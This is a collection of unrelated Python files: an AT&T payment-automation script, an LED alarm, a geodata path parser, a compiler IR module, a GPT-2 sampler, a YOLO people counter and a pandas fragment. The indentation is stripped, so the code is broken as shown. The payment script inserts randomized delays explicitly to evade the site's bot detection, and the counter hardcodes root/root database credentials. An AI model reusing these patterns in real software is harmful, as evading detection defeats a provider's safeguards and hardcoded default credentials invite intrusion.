from selenium.webdriver.support.wait import WebDriverWait
import utils
from result import Result
LOGGER = logging.getLogger('debbit')
# Written by reddit user reddit.com/u/jonnno_
def web_automation(driver, merchant, amount):
driver.get('https://www.att.com/my/#/passthrough/overview')
# Wait until login screen, promotion pop-up, or account dashboard shows.
WebDriverWait(driver, 120).until(utils.AnyExpectedCondition(
expected_conditions.element_to_be_clickable((By.NAME, "password")), # logged out
expected_conditions.element_to_be_clickable((By.XPATH, "//*[contains(@id,'ancel')]")), # mfa flow identified by cancel button
expected_conditions.element_to_be_clickable((By.XPATH, "//img[contains(@src,'btnNoThanks')]")), # logged in
expected_conditions.element_to_be_clickable((By.XPATH, "//button[contains(text(),'Make a payment')]")) # logged in
))
handle_mfa_code_flow(driver)
time.sleep(1 + random.random() * 2) # AT&T is using bot detection software, slow down the automation a bit to help avoid detection
if driver.find_elements_by_name('password'): # password field found, need to log in
try:
driver.find_element_by_id('userID').send_keys(merchant.usr)
time.sleep(1 + random.random() * 2)
except common.exceptions.NoSuchElementException:
pass
driver.find_element_by_name('password').send_keys(merchant.psw)
time.sleep(1 + random.random() * 2)
driver.find_element_by_xpath("//button[contains(text(),'Sign in')]").click()
try:
# Wait for potential promotions screen, regular account overview, or OTP flow
WebDriverWait(driver, 120).until(utils.AnyExpectedCondition(
expected_conditions.element_to_be_clickable((By.XPATH, "//img[contains(@src,'btnNoThanks')]")),
expected_conditions.element_to_be_clickable((By.XPATH, "//button[contains(text(),'Make a payment')]")),
expected_conditions.element_to_be_clickable((By.XPATH, "//*[contains(@id,'ancel')]")) # mfa flow identified by cancel button
))
except TimeoutException:
pass # Try continuing to the makePayment page just in case log in worked, but timeout failed
time.sleep(1 + random.random() * 2)
handle_mfa_code_flow(driver)
driver.get("https://www.att.com/my/#/makePayment")
# Enter amount and select payment card
WebDriverWait(driver, 20).until(expected_conditions.element_to_be_clickable((By.ID, "pmtAmount0")))
time.sleep(1 + random.random() * 2)
elem = driver.find_element_by_id('pmtAmount0')
elem.clear()
time.sleep(1 + random.random() * 2)
elem.send_keys(utils.cents_to_str(amount))
time.sleep(1 + random.random() * 2)
elem = driver.find_element_by_id("paymentMethod0")
before_first_payment_card = "Select Payment Method"
after_last_payment_card = "New checking / savings account"
while elem.get_attribute("value").lower() != before_first_payment_card.lower():
elem.send_keys(Keys.UP)
time.sleep(1 + random.random())
while elem.get_attribute("value").lower() != merchant.card.lower() and elem.get_attribute("value").lower() != after_last_payment_card.lower():
elem.send_keys(Keys.DOWN)
time.sleep(1 + random.random())
if elem.get_attribute("value").lower() == after_last_payment_card.lower():
raise Exception("Payment method " + merchant.card + " not found in list of saved payment methods")
# Continue
elem.send_keys(Keys.ENTER)
time.sleep(1 + random.random() * 2)
try:
WebDriverWait(driver, 20).until(expected_conditions.presence_of_element_located((By.XPATH, "//html/body/div[contains(@class,'modalwrapper active')]//p[contains(text(),'paying more than the amount due')]")))
driver.find_element_by_xpath("//html/body/div[contains(@class,'modalwrapper active')]//button[text()='OK']").click()
time.sleep(1 + random.random() * 2)
except TimeoutException:
pass
# Submit
WebDriverWait(driver, 20).until(expected_conditions.element_to_be_clickable((By.XPATH, "//button[text()='Submit']")))
WebDriverWait(driver, 20).until(expected_conditions.invisibility_of_element_located((By.ID, "loaderOverlay")))
time.sleep(2 + random.random())
driver.find_element_by_xpath("//button[text()='Submit']").click()
try:
WebDriverWait(driver, 120).until(utils.AnyExpectedCondition(
expected_conditions.presence_of_element_located((By.XPATH, "//*[contains(text(),'Thank you for your payment')]")),
expected_conditions.presence_of_element_located((By.XPATH, "//*[contains(text(),'payment was unsuccessful')]"))
))
if driver.find_elements_by_xpath("//*[contains(text(),'multiple payments')]"):
return Result.skipped # att does not allow payments of the same dollar amount within 24 hours, skip this purchase and try again 24 hours later
elif driver.find_elements_by_xpath("//*[text()='$" + utils.cents_to_str(amount) + "']"):
return Result.success
else:
return Result.unverified
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
return Result.unverified # Purchase command was executed, yet we are unable to verify that it was successfully executed.
# since debbit may have spent money but isn't sure, we log the error and stop any further payments for this merchant until the user intervenes
return Result.success
def handle_mfa_code_flow(driver):
if driver.find_elements_by_id('submitDest'): # MFA flow
LOGGER.info('One time multi-factor auth required. This will not happen after the first debbit run.')
try:
multi_mfa_options = False
try:
WebDriverWait(driver, 0).until(expected_conditions.element_to_be_clickable((By.ID, "submitDest")))
except TimeoutException: # The Send code button is not clickable. This means there are multiple MFA options. Ask user which one to use.
multi_mfa_options = True
if multi_mfa_options:
mfa_options = {}
for i in range(1, 10):
if driver.find_elements_by_id('m' + str(i) + 'label'):
mfa_options[i] = driver.find_element_by_id('m' + str(i) + 'label').text
LOGGER.info('')
LOGGER.info('Choose a multi-factor authentication option.')
for k, v in mfa_options.items():
LOGGER.info(' ' + str(k) + ' - ' + v)
LOGGER.info('Type a number 1-9 and then hit enter: ')
user_mfa_choice_input = input() # TODO put timeout around this
user_mfa_choice_index = ''.join([c for c in user_mfa_choice_input if c.isdigit()]) # sanitize input to remove all non digit characters
driver.find_element_by_id('m' + user_mfa_choice_index + 'label').click()
time.sleep(1 + random.random() * 2)
time.sleep(1 + random.random() * 2)
driver.find_element_by_id("submitDest").click()
WebDriverWait(driver, 20).until(expected_conditions.element_to_be_clickable((By.ID, "codeValue")))
LOGGER.info('Enter OTP here: ')
otp = input() # TODO put timeout around this
elem = driver.find_element_by_id("codeValue")
elem.send_keys(otp)
time.sleep(1 + random.random() * 2)
driver.find_element_by_xpath("//*[contains(@id,'ubmit')]").click() # submit or Submit button
WebDriverWait(driver, 120).until(utils.AnyExpectedCondition(
expected_conditions.element_to_be_clickable((By.XPATH, "//img[contains(@src,'btnNoThanks')]")),
expected_conditions.element_to_be_clickable((By.XPATH, "//button[contains(text(),'Make a payment')]"))
))
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
pass # User may have intervened by clicking around in the UI, allow failures to be ignored
|
#!/usr/bin/python
# makes a LPD8806 LED strip mimic a sunrise as an alarm clock
# uses the https://github.com/adammhaile/RPi-LPD8806 project for led helpers
import sys
sys.path.insert(0, './vendor/led-strip/RPi-LPD8806')
from bootstrap import *
# setup colors to loop through for fade
# colors use cls.cc standards
colors = [
(255.0,65.0,54.0), # red
(255.0,133.0,27.0), # orange
(255.0,220.0,0.0), # yellow
(255.0,254.0,254.0)
]
brightness = 0.2
brightness_per_step = 0.99 / len(colors)
for step in range(len(colors)):
r, g, b = colors[step]
brightness_max_this_step = brightness_per_step * ( step + 1 )
if brightness >= 0.9: # hard brightness limit on led strip
led.fill(Color(r, g, b, 0.99))
led.update()
else:
while brightness < brightness_max_this_step:
led.fill(Color(r, g, b, brightness))
led.update()
sleep(1)
brightness += 0.01
sleep(5)
sleep(1800)
led.all_off()
|
"""Implementation of Apache VFS schemes and URLs."""
import os
import sys
import re
from fiona.compat import urlparse
# Supported URI schemes and their mapping to GDAL's VSI suffix.
# TODO: extend for other cloud plaforms.
SCHEMES = {
'ftp': 'curl',
'gzip': 'gzip',
'http': 'curl',
'https': 'curl',
's3': 's3',
'tar': 'tar',
'zip': 'zip',
'gs': 'gs',
}
CURLSCHEMES = set([k for k, v in SCHEMES.items() if v == 'curl'])
# TODO: extend for other cloud plaforms.
REMOTESCHEMES = set([k for k, v in SCHEMES.items() if v in ('curl', 's3', 'gs')])
def valid_vsi(vsi):
"""Ensures all parts of our vsi path are valid schemes."""
return all(p in SCHEMES for p in vsi.split('+'))
def is_remote(scheme):
if scheme is None:
return False
return any(p in REMOTESCHEMES for p in scheme.split('+'))
def vsi_path(path, vsi=None, archive=None):
# If a VSI and archive file are specified, we convert the path to
# an OGR VSI path (see cpl_vsi.h).
if vsi:
prefix = '/'.join('vsi{0}'.format(SCHEMES[p]) for p in vsi.split('+'))
if archive:
result = '/{0}/{1}{2}'.format(prefix, archive, path)
else:
result = '/{0}/{1}'.format(prefix, path)
else:
result = path
return result
def parse_paths(uri, vfs=None):
"""Parse a URI or Apache VFS URL into its parts
Returns: tuple
(path, scheme, archive)
"""
archive = scheme = None
path = uri
# Windows drive letters (e.g. "C:\") confuse `urlparse` as they look like
# URL schemes
if sys.platform == "win32" and re.match("^[a-zA-Z]\\:", path):
return path, None, None
if vfs:
parts = urlparse(vfs)
scheme = parts.scheme
archive = parts.path
if parts.netloc and parts.netloc != 'localhost':
archive = parts.netloc + archive
else:
parts = urlparse(path)
scheme = parts.scheme
path = parts.path
if parts.netloc and parts.netloc != 'localhost':
if scheme.split("+")[-1] in CURLSCHEMES:
# We need to deal with cases such as zip+https://server.com/data.zip
path = "{}://{}{}".format(scheme.split("+")[-1], parts.netloc, path)
else:
path = parts.netloc + path
if scheme in SCHEMES:
parts = path.split('!')
path = parts.pop() if parts else None
archive = parts.pop() if parts else None
scheme = None if not scheme else scheme
return path, scheme, archive
|
import warnings
from itertools import chain
class IRMeta(type):
def __init__(cls, *args, **kwargs):
selector = 'return visitor.visit{}(self)'.format(cls.__name__)
accept_code = "def accept(self, visitor):\n\t{}".format(selector)
l = {}
exec(accept_code, globals(), l)
setattr(cls, "accept", l["accept"])
class IR(metaclass=IRMeta):
def is_variable_decl(self):
return False
def is_property(self):
return False
def is_variable(self):
return False
def is_net_var(self):
return False
def is_tuple(self):
return False
@property
def children(self):
return []
@children.setter
def children(self, children):
assert not children, "Setting children to object without children"
def ensureReal(self):
warnings.warn("don't know how to ensure Real", Warning)
return True
def ensureInt(self):
warnings.warn("don't know how to ensure Int", Warning)
return True
class Program(IR):
def __init__(self, body = []):
super(Program, self).__init__()
self.body = body
self.initBlocksNone()
self.addBlocks(body)
def initBlocksNone(self):
for name in self.blockNames():
setattr(self, name, None)
@property
def children(self):
return self.blocks()
@children.setter
def children(self, blocks):
self.addBlocks(blocks)
def addBlocks(self, blocks):
for block in blocks:
name = block.blockName()
if getattr(self, name) is not None:
assert False, "trying to set :{} twice.".format(name)
setattr(self, name, block)
def blocks(self):
## impose an evaluation order
for name in self.blockNames():
block = getattr(self, name, None)
if block is not None:
yield block
def blockNames(self):
return [
'networksblock', 'data', 'transformeddata', 'parameters', 'transformedparameters', \
'guideparameters', \
'guide', 'prior', 'model', 'generatedquantities' ]
class ProgramBlocks(IR):
def __init__(self, body = []):
super(ProgramBlocks, self).__init__()
self.body = body
self._nets = []
self._blackBoxNets = set()
def __eq__(self, other):
"""Basic equality"""
return self.children == other.children
@property
def children(self):
return self.body
@children.setter
def children(self, body):
self.body = body
@classmethod
def blockName(cls):
return cls.__name__.lower()
def is_data(self):
return False
def is_transformed_data(self):
return False
def is_transformed_parameters(self):
return False
def is_model(self):
return False
def is_guide(self):
return False
def is_networks(self):
return True
def is_guide_parameters(self):
return False
def is_prior(self):
return False
def is_parameters(self):
return False
def is_generated_quantities(self):
return False
class SamplingBlock(ProgramBlocks):
"""A program block where sampling is a valid statement """
def __init__(self, body = []):
super(SamplingBlock, self).__init__(body = body)
self._sampled = set()
def addSampled(self, variable):
self._sampled.add(variable)
class Model(SamplingBlock):
def is_model(self):
return True
class Guide(SamplingBlock):
def is_guide(self):
return True
class Prior(SamplingBlock):
def is_prior(self):
return True
class GuideParameters(ProgramBlocks):
def is_guide_parameters(self):
return True
class NetworksBlock(ProgramBlocks):
def __init__(self, decls = None):
super(NetworksBlock, self).__init__(body = decls)
@property
def decls(self):
return self.body
@decls.setter
def decls(self, decls):
self.body = decls
def is_networks(self):
return True
class Parameters(ProgramBlocks):
def is_parameters(self):
return True
class Data(ProgramBlocks):
def is_data(self):
return True
class TransformedData(ProgramBlocks):
def is_transformed_data(self):
return True
class TransformedParameters(ProgramBlocks):
def is_transformed_parameters(self):
return True
class GeneratedQuantities(ProgramBlocks):
def is_generated_quantities(self):
return True
class Statements(IR):
pass
class AssignStmt(Statements):
def __init__(self, target = None, value = None, constraints = None):
super(AssignStmt, self).__init__()
self.target = target
self.value = value
self.constraints = constraints
@property
def children(self):
return [self.target, self.value]
@children.setter
def children(self, children):
[self.target, self.value] = children
class SamplingStmt(Statements):
def __init__(self, target = None, id = None, args = None, shape = None):
super(SamplingStmt, self).__init__()
self.target = target
self.id = id
self.args = args
self.shape = shape
@property
def children(self):
assert False, "SamplingStmt.children should not be called"
# return [self.target,] + self.args + ([self.shape] if self.shape else [])
# @children.setter
# def children(self, children):
# self.target = children[0]
# self.args = children[1:]
class SamplingDeclaration(SamplingStmt):
pass
class SamplingObserved(SamplingStmt):
pass
class SamplingParameters(SamplingStmt):
pass
class SamplingFactor(SamplingStmt):
"""
Like observe but without distribution,
just the log-density.
This behavior is achieved using the following identity:
```
target += exp == -exp ~ exponential(1)
```
"""
def __init__(self, target = None):
super(SamplingFactor, self).__init__(target = target,
id = None,
args = [],
shape = None)
class ForStmt(Statements):
def __init__(self, id = None, from_ = None, to_ = None, body = None):
super(ForStmt, self).__init__()
self.id = id
self.from_ = from_
self.to_ = to_
self.body = body
@property
def children(self):
return [self.from_, self.to_, self.body]
@children.setter
def children(self, children):
[self.from_, self.to_, self.body] = children
class ConditionalStmt(Statements):
def __init__(self, test = None, true = None, false = None):
super(ConditionalStmt, self).__init__()
self.test = test
self.true = true
self.false = false
@property
def children(self):
return [self.test, self.true, self.false]
@children.setter
def children(self, children):
[self.test, self.true, self.false] = children
class WhileStmt(Statements):
def __init__(self, test = None, body = None):
super(WhileStmt, self).__init__()
self.test = test
self.body = body
@property
def children(self):
return [self.test, self.body]
@children.setter
def children(self, children):
[self.test, self.body] = children
class BlockStmt(Statements):
def __init__(self, body = None):
super(BlockStmt, self).__init__()
self.body = body
@property
def children(self):
return self.body
@children.setter
def children(self, children):
self.body = children
class CallStmt(Statements):
def __init__(self, id = None, args = None):
super(CallStmt, self).__init__()
self.id = id
self.args = args
@property
def children(self):
return [self.args]
@children.setter
def children(self, children):
[self.args,] = children
def __str__(self):
s = str(self.id) + "("
first = True
for a in self.args.children:
if first:
first = False
else:
s = s + ","
s = s + str(a)
s = s + ")"
return s
class BreakStmt(Statements):
pass
class ContinueStmt(Statements):
pass
class Expression(Statements):
def is_data_var(self):
return all(x.is_data_var() for x in self.children)
def is_transformed_data_var(self):
return all(x.is_transformed_data_var() for x in self.children)
def is_transformed_parameters_var(self):
return all(x.is_transformed_parameters_var() for x in self.children)
def is_params_var(self):
return (x.is_params_var() for x in self.children)
def is_guide_var(self):
return (x.is_guide_var() for x in self.children)
def is_guide_parameters(self):
return (x.is_guide_parameters_var() for x in self.children)
def is_prior_var(self):
return (x.is_prior_var() for x in self.children)
def is_generated_quantities_var(self):
return all(x.is_generated_quantities_var() for x in self.children)
class Constant(Expression):
def __init__(self, value = None):
super(Constant, self).__init__()
self.value = value
def ensureInt(self):
self.value = int(self.value)
def ensureReal(self):
self.value = float(self.value)
class Tuple(Expression):
def __init__(self, exprs = None):
super(Tuple, self).__init__()
self.exprs = exprs
def is_tuple(self):
return True
@property
def children(self):
return self.exprs
@children.setter
def children(self, children):
self.exprs = children
class Str(Expression):
def __init__(self, value = None):
super(Str, self).__init__()
self.value = value
class List(Expression):
def __init__(self, elements = []):
super(List, self).__init__()
self.elements = elements
@property
def children(self):
return self.elements
@children.setter
def children(self, children):
self.elements = children
class BinaryOperator(Expression):
def __init__(self, left = None, op = None, right = None):
super(BinaryOperator, self).__init__()
self.left = left
self.right = right
self.op = op
@property
def children(self):
return [self.left, self.right, self.op]
@children.setter
def children(self, children):
[self.left, self.right, self.op] = children
class UnaryOperator(Expression):
def __init__(self, value = None, op = None):
super(UnaryOperator, self).__init__()
self.value = value
self.op = op
@property
def children(self):
return [self.value, self.op]
@children.setter
def children(self, children):
[self.value, self.op] = children
class Subscript(Expression):
def __init__(self, id = None, index = None):
super(Subscript, self).__init__()
self.id = id
self.index = index
@property
def children(self):
return [self.id, self.index]
@children.setter
def children(self, children):
[self.id, self.index] = children
def is_data_var(self):
return self.id.is_data_var()
def is_transformed_data_var(self):
return self.id.is_transformed_data_var()
def is_transformed_parameters_var(self):
return self.id.is_transformed_parameters_var()
def is_params_var(self):
return self.id.is_params_var()
def is_guide_var(self):
return self.id.is_guide_var()
def is_guide_parameters_var(self):
return self.id.is_guide_parameters_var()
def is_prior_var(self):
return self.id.is_prior_var()
def is_generated_quantities_var(self):
return self.id.is_generated_quantities_var()
class VariableDecl(IR):
def __init__(self, id = None, dim = None, init = None,
type_ = None):
super(VariableDecl, self).__init__()
self.id = id
self.dim = dim
self.init = init
self.data = False
self.parameters = False
self.transformed_parameters = False
self.transformed_data = False
self.generated_quantities = False
self.type_ = type_
def is_variable_decl(self):
return True
def set_data(self):
self.data = True
def set_parameters(self):
self.parameters = True
def set_transformed_parameters(self):
self.transformed_parameters = True
def set_transformed_data(self):
self.transformed_data = True
def set_generated_quatities(self):
self.generated_quantities = True
@property
def children(self):
return [self.dim, self.init, self.type_]
@children.setter
def children(self, children):
[self.dim, self.init, self.type_] = children
class Type_(IR):
def __init__(self, type_ = None, constraints = None, is_array = False, dim = None):
super(Type_, self).__init__()
self.type_ = type_
self.constraints = constraints or []
self.is_array = is_array
self.dim = dim
if self.constraints:
if self.type_ == 'int':
f = lambda x: x.ensureInt()
elif self.type_ == 'real':
f = lambda x: x.ensureReal()
elif self.type_ == 'vector':
f = lambda x: x.ensureReal()
elif self.type_ == 'matrix':
f = lambda x: x.ensureReal()
else:
assert False, f"Unknown type: {self.type_}"
[f(constraint) for constraint in self.constraints]
@property
def children(self):
return self.constraints
@children.setter
def children(self, constraints):
self.constraints = constraints
class Constraint(IR):
def __init__(self, sort = None, value = None):
super(Constraint, self).__init__()
self.sort = sort
self.value = value
def ensureReal(self):
self.value.ensureReal()
def ensureInt(self):
self.value.ensureInt()
@property
def children(self):
return [self.value, ]
@children.setter
def children(self, values):
self.value, = values
class Variable(Expression):
def __init__(self, id = None):
super(Variable, self).__init__()
self.id = id
self.block_name = None
def __str__(self):
return str(self.id)
def __eq__(self, other):
return isinstance(other, Variable) and \
self.id == other.id
def is_variable(self):
return True
def is_data_var(self):
return self.block_name == Data.blockName()
def is_transformed_data_var(self):
return self.block_name == TransformedData.blockName()
def is_params_var(self):
return self.block_name == Parameters.blockName()
def is_transformed_parameters_var(self):
return self.block_name == TransformedParameters.blockName()
def is_guide_var(self):
return self.block_name == Guide.blockName()
def is_guide_parameters_var(self):
return self.block_name == GuideParameters.blockName()
def is_prior_var(self):
return self.block_name == Prior.blockName()
def is_generated_quantities_var(self):
return self.block_name == GeneratedQuantities.blockName()
class VariableProperty(Expression):
def __init__(self, var = None, prop = None):
super(VariableProperty, self).__init__()
self.var = var
self.prop = prop
def is_property(self):
return True
class AnonymousShapeProperty(VariableProperty):
@classmethod
def newvar(cls):
if hasattr(cls, 'counter'):
cls.counter = cls.counter+1
else:
cls.counter = 0
return Variable(id="anon"+str(cls.counter))
def __init__(self):
super(AnonymousShapeProperty, self).__init__(var = AnonymousShapeProperty.newvar(), prop="shape")
class NetVariableProperty(VariableProperty):
pass
class NetDeclaration(IR):
def __init__(self, name = None, cls = None, params = []):
super(NetDeclaration, self).__init__()
self.name = name
self.net_cls = cls
self.params = params
class NetVariable(Expression):
def __init__(self, name = None, ids = []):
super(NetVariable, self).__init__()
self.name = name
self.ids = ids
self.block_name = None
@property
def id(self):
return '.'.join(chain([self.name], self.ids))
def is_net_var(self):
return True
class Operator(Expression):
pass
class Plus(Operator):
pass
class Minus(Operator):
pass
class Pow(Operator):
pass
class Mult(Operator):
pass
class DotMult(Operator):
pass
class Div(Operator):
pass
class DotDiv(Operator):
pass
class And(Operator):
pass
class Or(Operator):
pass
class LE(Operator):
pass
class GE(Operator):
pass
class LT(Operator):
pass
class GT(Operator):
pass
class EQ(Operator):
pass
class UOperator(Operator):
"""Unary operators."""
class UPlus(UOperator):
pass
class UMinus(UOperator):
pass
class UNot(UOperator):
pass
|
from transformers import GPT2LMHeadModel, GPT2Tokenizer, GPT2Config
import torch
import torch.nn
import torch.distributions
import torch.nn.functional as F
import random
import numpy as np
import pickle
from utils import rand_gen_first_token
import h5py
END_TOKEN = '<|endoftext|>'
fname = 'sampling.txt'
MAX_LENGTH = 994
N_EPS = 100
FILEPATH = 'sampling'
tokenizer = GPT2Tokenizer.from_pretrained("gpt2")
config = GPT2Config()
config.output_hidden_states = True
model = GPT2LMHeadModel.from_pretrained('gpt2', config=config)
#device = torch.device("cuda" if args.cuda else "cpu")
def gen_episode(outf, f, eps):
model.eval()
reward_sum = 0.0
data = f.create_group('eps' + str(eps))
dt = h5py.string_dtype(encoding='ascii')
data.create_dataset('state', (MAX_LENGTH,), dtype=dt)
data.create_dataset('final_reward', (1,), dtype='f')
data.create_dataset('final_length', (1,), dtype='i')
#data.create_dataset('emb_state', (MAX_LENGTH, 768), dypte='f')
data.create_dataset('action', (MAX_LENGTH,), dtype='i')
data.create_dataset('prob', (MAX_LENGTH,), dtype='f')
data.create_dataset('reward', (MAX_LENGTH,), dtype='f')
generated, past = rand_gen_first_token(model, tokenizer, device=None)
f['eps' + str(eps)]['state'][0] = tokenizer.decode(generated[-1])
#f['eps' + str(eps)]['emb_state'][0] = past
length = 0
context = torch.tensor([generated])
while generated[-1] != tokenizer.encode([END_TOKEN])[0] and length < MAX_LENGTH-1:
logits, past, _ = model(context, past=past)
if len(logits.shape) > 2:
topk = torch.topk(F.softmax(logits[...,-1,:], 1),100)
else:
topk = torch.topk(F.softmax(logits, 1), 100)
token_idx = torch.multinomial(topk.values, 1).item()
token = topk.indices[0,token_idx].item()
generated += [token]
context = torch.tensor([token])
sequence = tokenizer.decode(generated)
f['eps' +str(eps)]['state'][length+1] = tokenizer.decode(generated[-1])
#f['eps' + str(eps)]['emb_state'][length+1] = past
f['eps' + str(eps)]['action'][length] = token_idx
if len(F.softmax(logits[...,-1,:]).shape) == 2:
prob_reward = F.softmax(logits[...,-1,:])[:,token].item()
else:
prob_reward = F.softmax(logits[...,-1,:])[token].item()
f['eps' + str(eps)]['prob'][length] = prob_reward
f['eps' + str(eps)]['reward'][length] = prob_reward
reward_sum += prob_reward
length += 1
outf.write(sequence)
f['eps' + str(eps)]['final_reward'][0] = reward_sum
f['eps' + str(eps)]['final_length'][0] = length
if length >= MAX_LENGTH:
f['eps' + str(eps)]['final_reward'][0] -= 100
f['eps' + str(eps)]['reward'][-1] -= 100
outf.write(END_TOKEN)
with open(fname, 'w') as outf:
f = h5py.File(FILEPATH + '.hdf5', 'w')
for i in range(N_EPS):
gen_episode(outf, f, i)
print('END OF EPS')
f.close()
print('END OF OUTF')
|
import cv2 as cv
import numpy as np
import datetime
import mysql.connector
from centroid import CentroidTracker
from trackable import TrackableObject
Down1 = 0
Up1 = 0
Down2 = 0
Up2 = 0
def main():
whT = 320
confidenceThres = 0.4
nmsThreshold = 0.3
cap = cv.VideoCapture("test.mp4")
cap2 = cv.VideoCapture("TestVideo.avi")
classesFile = "coco-names.txt"
classes = []
with open(classesFile,'rt') as f:
classes = f.read().rstrip('\n').split('\n')
modelConfig = "yolov3-tiny.cfg"
modelWeights = "yolov3-tiny.weights"
net = cv.dnn.readNetFromDarknet(modelConfig,modelWeights)
net.setPreferableBackend(cv.dnn.DNN_BACKEND_OPENCV)
net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)
ct = CentroidTracker(maxDisappeared=40, maxDistance=50)
trackers = []
trackableObjects = {}
def counting(objects):
frameHeight = img.shape[0]
frameWidth = img.shape[1]
global Down1
global Up1
for (objectID, centroid) in objects.items():
to = trackableObjects.get(objectID, None)
if to is None:
to = TrackableObject(objectID, centroid)
else:
y = [c[1] for c in to.centroids]
direction = centroid[1] - np.mean(y)
to.centroids.append(centroid)
if not to.counted:
if direction < 0 and centroid[1] in range((frameHeight*17)//20 - 30, (frameHeight*17)//20 + 30):
Up1 += 1
to.counted = True
elif direction > 0 and centroid[1] in range((frameHeight*3)//20 - 30, (frameHeight*3)//20 + 30):
Down1 += 1
to.counted = True
trackableObjects[objectID] = to
cv.circle(img, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)
info = [
("Up", Up1),
("Down", Down1),
]
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv.putText(img, text, (10, frameHeight - ((i * 20) + 20)),
cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
def findObjects(outputs,img):
hT,wT,cT = img.shape
bbox = []
classIds = []
confs = []
rects = []
for output in outputs:
for det in output:
scores = det[5:]
classId = np.argmax(scores)
confidence = scores[classId]
if confidence > confidenceThres:
w,h = int(det[2]*wT), int(det[3]*hT)
x,y = int((det[0]*wT) - w/2),int((det[1]*hT) - h/2)
bbox.append([x,y,w,h])
classIds.append(classId)
confs.append(float(confidence))
indices = cv.dnn.NMSBoxes(bbox,confs,confidenceThres,nmsThreshold)
for i in indices:
i = i[0]
box = bbox[i]
x,y,w,h = box[0],box[1],box[2],box[3]
if classes[classIds[i]].upper() == "PERSON":
cv.rectangle(img,(x,y),(x+w,y+h),(255,0,0),thickness=2)
cv.putText(img,f'{classes[classIds[i]].upper()} {int(confs[i]*100)}%',(x,y-10),cv.FONT_HERSHEY_SIMPLEX,
0.6,(255,255,0),thickness = 2)
rects.append((x,y,x+w,y+h))
objects = ct.update(rects)
counting(objects)
x = datetime.datetime.now()
cv.putText(img,f'{x.strftime("%x")}',(10,65),cv.FONT_HERSHEY_SIMPLEX,0.6,(0,255,0),thickness=2)
cv.putText(img,f'{x.strftime("%X")}',(10,95),cv.FONT_HERSHEY_SIMPLEX,0.6,(0,255,0),thickness=2)
def counting2(objects):
frameHeight = img2.shape[0]
frameWidth = img2.shape[1]
global Down2
global Up2
for (objectID, centroid) in objects.items():
to = trackableObjects.get(objectID, None)
if to is None:
to = TrackableObject(objectID, centroid)
else:
y = [c[1] for c in to.centroids]
direction = centroid[1] - np.mean(y)
to.centroids.append(centroid)
if not to.counted:
if direction < 0 and centroid[1] in range((frameHeight*17)//20 - 30, (frameHeight*17)//20 + 30):
Up2 += 1
to.counted = True
elif direction > 0 and centroid[1] in range((frameHeight*3)//20 - 30, (frameHeight*3)//20 + 30):
Down2 += 1
to.counted = True
trackableObjects[objectID] = to
cv.circle(img2, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)
info = [
("Up", Up2),
("Down", Down2),
]
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv.putText(img2, text, (10, frameHeight - ((i * 20) + 20)),
cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
def findObjects2(outputs2,img2):
hT,wT,cT = img2.shape
bbox = []
classIds = []
confs = []
rects = []
for output in outputs2:
for det in output:
scores = det[5:]
classId = np.argmax(scores)
confidence = scores[classId]
if confidence > confidenceThres:
w,h = int(det[2]*wT), int(det[3]*hT)
x,y = int((det[0]*wT) - w/2),int((det[1]*hT) - h/2)
bbox.append([x,y,w,h])
classIds.append(classId)
confs.append(float(confidence))
indices = cv.dnn.NMSBoxes(bbox,confs,confidenceThres,nmsThreshold)
for i in indices:
i = i[0]
box = bbox[i]
x,y,w,h = box[0],box[1],box[2],box[3]
if classes[classIds[i]].upper() == "PERSON":
cv.rectangle(img2,(x,y),(x+w,y+h),(255,0,0),thickness=2)
cv.putText(img2,f'{classes[classIds[i]].upper()} {int(confs[i]*100)}%',(x,y-10),cv.FONT_HERSHEY_SIMPLEX,
0.6,(255,255,0),thickness = 2)
rects.append((x,y,x+w,y+h))
objects = ct.update(rects)
counting2(objects)
x = datetime.datetime.now()
cv.putText(img2,f'{x.strftime("%x")}',(10,65),cv.FONT_HERSHEY_SIMPLEX,0.6,(0,255,0),thickness=2)
cv.putText(img2,f'{x.strftime("%X")}',(10,95),cv.FONT_HERSHEY_SIMPLEX,0.6,(0,255,0),thickness=2)
while(True):
success,img = cap.read()
frameHeight = img.shape[0]
frameWidth = img.shape[1]
cv.line(img, (0, (frameHeight*3) // 20), (frameWidth, (frameHeight*3) // 20), (255, 255, 255), 2)
cv.line(img, (0, (frameHeight*17) // 20), (frameWidth, (frameHeight*17) // 20), (255, 255, 255), 2)
blob = cv.dnn.blobFromImage(img,1/255,(whT,whT),[0,0,0],1,crop=False)
net.setInput(blob)
layerNames = net.getLayerNames()
outputNames = [layerNames[i[0]-1] for i in net.getUnconnectedOutLayers()]
outputs = net.forward(outputNames)
findObjects(outputs,img)
resized = cv.resize(img,(550,550),interpolation = cv.INTER_AREA)
success2,img2 = cap2.read()
frameHeight2 = img2.shape[0]
frameWidth2 = img2.shape[1]
cv.line(img2, (0, (frameHeight2*3) // 20), (frameWidth2, (frameHeight2*3) // 20), (255, 255, 255), 2)
cv.line(img2, (0, (frameHeight2*17) // 20), (frameWidth2, (frameHeight2*17) // 20), (255, 255, 255), 2)
blob2 = cv.dnn.blobFromImage(img2,1/255,(whT,whT),[0,0,0],1,crop=False)
net.setInput(blob2)
layerNames2 = net.getLayerNames()
outputNames2 = [layerNames2[i[0]-1] for i in net.getUnconnectedOutLayers()]
outputs2 = net.forward(outputNames2)
findObjects2(outputs2,img2)
resized2 = cv.resize(img2,(550,550),interpolation = cv.INTER_AREA)
Hori = np.concatenate((resized, resized2), axis=1)
cv.imshow("Image",Hori)
total1 = Up1+Down1
total2 = Up2+Down2
t = datetime.datetime.now()
day = t.strftime("%Y-%m-%d")
if cv.waitKey(20) & 0xFF==ord('d'):
break
cap.release()
cv.destroyAllWindows()
db = mysql.connector.connect(
host = "localhost",
user = "root",
password = "root",
database = "mydatabase"
)
mycursor = db.cursor()
sql = "INSERT INTO aisles (A1, A2, Day) VALUES (%s, %s, %s)"
val = (total1,total2,day)
mycursor.execute(sql,val)
db.commit()
print(mycursor.rowcount, "record inserted.")
def work2():
main()
|
import pandas as pd
import numpy as np
import seaborn as sns
from pandas import ExcelWriter
import will as w
df_stint = pd.read_pickle("stint.txt")
